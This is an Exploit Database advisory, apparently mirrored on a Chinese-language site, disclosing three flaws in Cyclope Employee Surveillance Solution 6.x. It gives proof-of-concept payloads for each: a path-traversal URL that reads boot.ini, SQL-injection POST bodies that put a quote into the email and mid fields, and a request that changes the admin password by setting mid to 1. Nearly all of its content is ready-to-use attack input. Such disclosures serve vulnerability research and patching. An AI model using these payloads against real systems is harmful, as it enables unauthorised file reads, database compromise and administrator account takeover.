Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 – Multiple Vulnerabilities

• Exploit Database
• 20 阅读

• 作者： loneferret
  日期： 2012-08-15
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20545/

• # Author: loneferret of Offensive Security
  # Product: Cyclope Employee Surveillance Solution v6.0
  # Version: 6.1.0 & 6.2.0
  # Vendor Site: http://www.cyclope-series.com/
  # Software Download: http://www.cyclope-series.com/download/index.html
  
  # Software description:
  # The employee monitoring software developed by Cyclope-Series is specially designed to inform
  # and equip management with statistics relating to the productivity of staff within their organization.
  
  # Vulnerability PoC 1:
  # Local File Include
  #
  # Requirements: Employee access
  # PoC:
  # http://172.16.194.134:7879/help.php?pag=../../../../../../boot.ini%00
  
  # Vulnerability PoC 2:
  # SQL Injection
  # Requirements: Employee access
  #
  # http://172.16.194.134:7879/index.php?pag=myaccount
  # -Fields affected in form:
  # -First Name
  # -Last Name
  # -Password / Re-Type Password
  # -Email
  # -mid
  # Poc:
  # mid=15&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email='
  # mid=15'&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email=
  # and so on...
  
  # Vulnerability PoC 3:
  # Change Admin account's password.
  # Requirements: Employee access
  # http://172.16.194.134:7879/index.php?pag=myaccount
  #
  # Using a tool such as Tamper Data or Live HTTP Headers, change the value
  # of 'mid' to 1
  # PoC:
  # Post Data: mid=1&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email=